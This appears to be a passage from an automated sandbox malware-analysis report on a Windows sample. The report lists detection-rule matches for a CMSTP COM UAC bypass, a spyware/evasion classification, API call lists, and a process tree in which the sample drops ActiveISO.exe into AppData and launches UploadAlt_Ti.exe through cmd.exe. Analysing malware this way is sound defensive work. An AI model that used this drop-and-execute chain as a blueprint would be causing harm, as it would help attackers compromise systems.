                  Source: 15.2.UploadAlt_Ti.exe.265da20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.cmd.exe.50836cd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: ActiveISO.exe, 00000008.00000002.1342713513.00007FFB0AF51000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 0000000A.00000002.1428560349.00007FFB09971000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: com.slnishinomiya.hyogo.jpkustanai.rucom.snpassenger-association.aerocom.sotsushima.nagasaki.jpcom.stuy.comx.seisa-geek.comcom.sv
                  Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@20/31@1/1
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,6_2_00407776
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653734050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEB8_2_00007FF653734050
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE4050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAE10_2_00007FF6B1FE4050
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_0040118A GetDiskFreeSpaceExW,SendMessageW,6_2_0040118A
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,6_2_004034C1
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,6_2_00401BDF
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile created: C:\Users\user\dcfaJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeFile created: C:\Users\user~1\AppData\Local\Temp\f4c659c6Jump to behavior
                  Source: TVr2Z822J3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: ActiveISO.exeString found in binary or memory: :/chookIsoManager/Resources/load.png
                  Source: ActiveISO.exeString found in binary or memory: /ADD=
                  Source: ActiveISO.exeString found in binary or memory: :/chookIsoManager/Resources/load.png
                  Source: ActiveISO.exeString found in binary or memory: /ADD=
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeFile read: C:\Users\user\Desktop\TVr2Z822J3.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\TVr2Z822J3.exe "C:\Users\user\Desktop\TVr2Z822J3.exe"
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeProcess created: C:\Users\user\ActiveISO.exe "C:\Users\user\ActiveISO.exe"
                  Source: C:\Users\user\ActiveISO.exeProcess created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe "C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe "C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeProcess created: C:\Users\user\ActiveISO.exe "C:\Users\user\ActiveISO.exe" Jump to behavior
                  Source: C:\Users\user\ActiveISO.exeProcess created: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exeJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: starburn.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5printsupport.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5network.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\ActiveISO.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: starburn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5printsupport.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5widgets.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5gui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5network.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: qt5core.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: pla.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: tdh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exeSection loaded: dhcpcsvc6.dllJump to behavior
